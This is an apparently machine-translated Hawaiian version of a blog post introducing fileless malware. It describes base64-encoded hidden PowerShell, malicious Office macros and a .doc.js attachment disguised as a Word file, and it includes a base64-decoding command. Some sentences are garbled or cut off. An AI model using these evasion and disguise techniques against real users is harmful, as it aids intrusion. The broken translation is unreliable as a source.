Me kēia ʻatikala e hoʻomaka mākou i kahi pūʻulu o nā puke e pili ana i ka malware elusive. Hoʻohana maʻamau nā polokalamu hacking fileless, ʻike ʻia hoʻi ʻo nā polokalamu hacking fileless, PowerShell ma nā ʻōnaehana Windows no ka holo leo ʻana i nā kauoha e ʻimi a unuhi i nā ʻike waiwai. ʻO ka ʻike ʻana i ka hana hacker me ka ʻole o nā faila hewa he hana paʻakikī, no ka mea... nā antiviruses a me nā ʻōnaehana ʻike ʻē aʻe e hana ma muli o ka nānā ʻana i ka pūlima. Akā ʻo ka nūhou maikaʻi e loaʻa ana kēlā polokalamu. ʻo kahi laʻana,
I koʻu hoʻomaka ʻana e noiʻi i ke kumuhana o nā hacker hacker,
ʻO ka PowerShell Nui a mana
Ua kākau wau e pili ana i kekahi o kēia mau manaʻo ma mua
Ma waho aʻe o nā laʻana iā lākou iho, ma ka pūnaewele hiki iā ʻoe ke ʻike i ka hana a kēia mau papahana. Hoʻopili ʻo Hybrid analysis i ka malware i loko o kāna pahu pahu ponoʻī a nānā i nā kelepona ʻōnaehana, nā kaʻina hana a me ka hana pūnaewele, a unuhi i nā kaula kikokikona kānalua. No nā binaries a me nā faila hoʻokō ʻē aʻe, i.e. kahi ʻaʻole hiki iā ʻoe ke nānā i ke code kūlana kiʻekiʻe maoli, hoʻoholo ka loiloi hybrid inā he ʻino a kānalua paha ka polokalamu ma muli o kāna hana runtime. A ma hope o kēlā, ua loiloi ʻia ka hāpana.
Ma ka hihia o PowerShell a me nā palapala hōʻailona ʻē aʻe (Visual Basic, JavaScript, etc.), hiki iaʻu ke ʻike i ke code ponoʻī. No ka laʻana, ua loaʻa iaʻu kēia hiʻohiʻona PowerShell:
Hiki iā ʻoe ke holo i ka PowerShell ma base64 encoding e pale aku i ka ʻike. E hoʻomaopopo i ka hoʻohana ʻana i nā ʻāpana Noninteractive a huna.
Inā ua heluhelu ʻoe i kaʻu mau pou e pili ana i ka obfuscation, a laila ʻike ʻoe i ka koho -e e kuhikuhi ana i ka ʻike he base64 i hoʻopili ʻia. Ma ke ala, kōkua pū ka loiloi hybrid me kēia ma ka hoʻihoʻi ʻana i nā mea āpau. Inā makemake ʻoe e hoʻāʻo i ka decoding base64 PowerShell (i kapa ʻia ʻo PS) iā ʻoe iho, pono ʻoe e holo i kēia kauoha:
[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($EncodedText))
E hele hohonu
Ua hoʻololi au i kā mākou palapala PS me kēia ʻano, aia ma lalo ka kikokikona o ka papahana, ʻoiai ua hoʻololi iki ʻia e aʻu:
E hoʻomaopopo ua hoʻopaʻa ʻia ka palapala i ka lā Sepatemaba 4, 2017 a ua hoʻouna ʻia nā kuki hālāwai.
Ua kākau wau e pili ana i kēia ʻano hoʻouka kaua ma
Aha ia hana?
No ka polokalamu palekana e nānā ana i nā log hanana hanana Windows a i ʻole nā pahu ahi, pale ʻo base64 encoding i ke kaula "WebClient" mai ka ʻike ʻia ʻana e kahi kumu kikokikona maʻalahi e pale aku i ka hana ʻana i kēlā noi pūnaewele. A no ka mea, ua hoʻoiho ʻia nā "ʻino" āpau o ka malware a hoʻoili ʻia i loko o kā mākou PowerShell, hiki i kēia ala ke ʻae iā mākou e ʻalo loa i ka ʻike. A i ʻole, ʻo ia koʻu manaʻo i ka wā mua.
Ua hoʻololi ʻia me ka Windows PowerShell Advanced Logging i hiki ai (e ʻike i kaʻu ʻatikala), hiki iā ʻoe ke ʻike i ka laina i hoʻouka ʻia i ka hanana hanana. Ua like wau
E hoʻohui i nā hiʻohiʻona hou
Huna akamai ka poe hackers i ka hoouka kaua PowerShell ma Microsoft Office macros i kakauia ma Visual Basic a me na olelo palapala. ʻO ka manaʻo e loaʻa i ka mea i hōʻeha ʻia kahi leka, no ka laʻana mai kahi lawelawe lawe, me kahi hōʻike i hoʻopili ʻia ma ke ʻano .doc. Wehe ʻoe i kēia palapala i loaʻa ka macro, a hoʻopau i ka hoʻomaka ʻana i ka PowerShell ponoʻī ponoʻī.
Hoʻopili pinepine ʻia ka palapala Visual Basic ponoʻī i mea e pale wale aku ai i ka antivirus a me nā mea ʻimi polokalamu polokalamu ʻē aʻe. Ma ka manaʻo o luna, ua hoʻoholo wau e hoʻopaʻa inoa i ka PowerShell ma luna o JavaScript ma ke ʻano he hoʻomaʻamaʻa. Ma lalo iho nei nā hopena o kaʻu hana:
Ua hūnā ʻo JavaScript i kā mākou PowerShell. Hana nā mea hacker maoli i hoʻokahi a ʻelua paha.
ʻO kēia kekahi ʻenehana aʻu i ʻike ai e lana ana a puni ka pūnaewele: me ka hoʻohana ʻana iā Wscript.Shell e holo i ka PowerShell coded. Ma ke ala, ʻo JavaScript ponoʻī
I kā mākou hihia, ua hoʻokomo ʻia ka palapala JS ʻino ma ke ʻano he faila me ka hoʻonui .doc.js. Hōʻike maʻamau ʻo Windows i ka suffix mua, no laila e ʻike ʻia i ka mea i pepehi ʻia ma ke ʻano he palapala Word.
Hōʻike wale ʻia ka ikona JS ma ke kiʻi ʻōwili. ʻAʻole ia he mea kupanaha ka nui o ka poʻe e wehe i kēia hoʻopili me ka manaʻo he palapala Word ia.
Ma kaʻu laʻana, ua hoʻololi au i ka PowerShell ma luna e hoʻoiho i ka palapala mai kaʻu pūnaewele. Paʻi wale ka palapala PS mamao "Evil Malware". E like me kāu e ʻike ai, ʻaʻole ia he ʻino. ʻOiaʻiʻo, makemake nā hackers maoli i ka loaʻa ʻana i kahi kamepiula a i ʻole server, e ʻōlelo, ma o ka shell command. Ma ka ʻatikala aʻe, e hōʻike wau iā ʻoe pehea e hana ai i kēia me ka hoʻohana ʻana i ka PowerShell Empire.
Manaʻo wau no ka ʻatikala hoʻolauna mua ʻaʻole mākou i luʻu hohonu i ke kumuhana. I kēia manawa, e hoʻomaha wau iā ʻoe, a i ka manawa aʻe e hoʻomaka mākou e nānā i nā hiʻohiʻona maoli o ka hoʻouka ʻana me ka hoʻohana ʻana i ka malware fileless me ka ʻole o nā huaʻōlelo hoʻolauna a i ʻole ka hoʻomākaukau ʻana.
Source: www.habr.com